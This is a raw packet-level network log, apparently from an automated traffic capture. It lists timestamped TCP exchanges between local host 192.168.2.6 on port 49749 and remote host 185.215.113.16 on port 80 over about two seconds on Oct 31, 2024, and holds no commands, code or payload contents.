                                                                            Oct 31, 2024 20:49:51.012022018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.012027025 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.012077093 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.012600899 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.052613974 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.088140965 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.088659048 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.088671923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.088787079 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.088815928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.088828087 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.088871002 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.130590916 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.130635023 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.130649090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.130686998 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.130717993 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.130757093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.130769968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.130811930 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.131032944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.131043911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.131082058 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.131125927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.131325006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.131424904 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.207664013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.207684040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.207699060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.207798958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.207799911 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.207812071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.207866907 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.249222040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.249255896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.249269009 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.249341011 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.249656916 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.249665976 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.249671936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.249746084 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.249811888 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.249821901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.249833107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.249845028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.249862909 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.249907970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.326499939 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.326653957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.326667070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.326714039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.326728106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.326782942 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.326782942 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.368283033 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.368637085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.368649006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.368733883 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.368908882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.368918896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.368928909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.368937969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.368968964 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.368997097 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.369144917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.369155884 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.369190931 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.445993900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.446008921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.446026087 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.446191072 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.446794987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.446851015 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.487114906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.487133980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.487173080 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.487206936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.487370968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.487468004 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.487552881 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.487612009 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.487623930 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.487634897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.487654924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.487668037 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.487725973 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.488255024 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.488269091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.488312960 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.564785004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.564933062 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.564965963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.565083027 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.607033968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.607049942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.607060909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.607074976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.607125998 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.607157946 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.607362986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.607373953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.607418060 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.607676029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.607687950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.607698917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.607717991 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.607749939 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.608248949 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.608259916 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.608277082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.608285904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.608314037 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.608330965 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.684258938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.684385061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.684396982 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.684453011 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.727206945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.727242947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.727255106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.727322102 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.727322102 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.727505922 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.727519035 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.727530956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.727541924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.727564096 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.727621078 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.728041887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.728589058 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.728600979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.728671074 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.771364927 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.774991989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.775058985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.775109053 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.802804947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.802886963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.802897930 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.802951097 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.845930099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.845978975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.845989943 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.846021891 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.846021891 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.846276999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.846287012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.846338987 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.846540928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.846549988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.846606016 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.846776009 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.846882105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.846890926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.846899986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.846944094 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.846944094 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.922772884 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.922802925 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.922815084 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.922826052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.922868967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.922902107 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.966062069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.966094017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.966108084 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.966167927 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.966228008 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.966550112 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.966563940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.966615915 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.966865063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.966877937 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.966929913 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.967068911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.967080116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.967092037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.967122078 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.967489958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.967502117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.967535973 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.045634031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.045654058 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.045666933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.045730114 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.086039066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.086071968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.086085081 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.086265087 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.086369991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.086381912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.086445093 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.087136984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.087245941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.087256908 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.087320089 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.087536097 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.087548018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.087603092 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.127084970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.127151966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.127165079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.127304077 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.167589903 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.167606115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.167618990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.167831898 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.205703974 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.206291914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.206305027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.206372976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.206379890 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.206384897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.206532955 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.207122087 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.207170963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.207181931 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.207223892 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.207906008 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.207916975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.207926989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.207978010 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.207978010 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.246221066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.246241093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.246283054 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.246299028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.246366978 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.246438026 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.286786079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.286808968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.286820889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.286854982 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.325007915 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.325047970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.325067997 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.325079918 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.325090885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.325103998 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.325151920 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.325238943 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.325968981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.326050043 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.326090097 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.326128960 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.326128960 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.326226950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.326240063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.326304913 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.326507092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.365896940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.365902901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.365917921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.365974903 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.365974903 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.406781912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.406805992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.406824112 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.406836033 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.406914949 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.406943083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.443850040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.443898916 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.443902969 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.443909883 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.443950891 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.444118977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.444250107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.444293976 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.445669889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.445739985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.445751905 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.445777893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.446254015 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.446266890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.446300983 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.484918118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.484956980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.484971046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.484997034 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.485169888 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.526073933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.526114941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.526238918 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.527193069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.527292013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.527306080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.527332067 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.527534962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.527580976 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.563235998 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.563261986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.563276052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.563308954 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.563478947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.563492060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.563556910 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.563719034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.563771009 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.563812971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.563826084 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.563860893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.564199924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.564317942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.564330101 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.564369917 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.603919029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.603945971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.603960037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.604016066 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.604016066 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.649377108 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.649390936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.649401903 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.649445057 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.650326014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.650337934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.650429964 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.682343006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.682401896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.682585001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.682595968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.682678938 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.682717085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.682729006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.682786942 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.682945013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.682965040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.683012962 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.683290005 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.683301926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:52.683355093 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:52.684628963 CET8049749185.215.113.16192.168.2.6
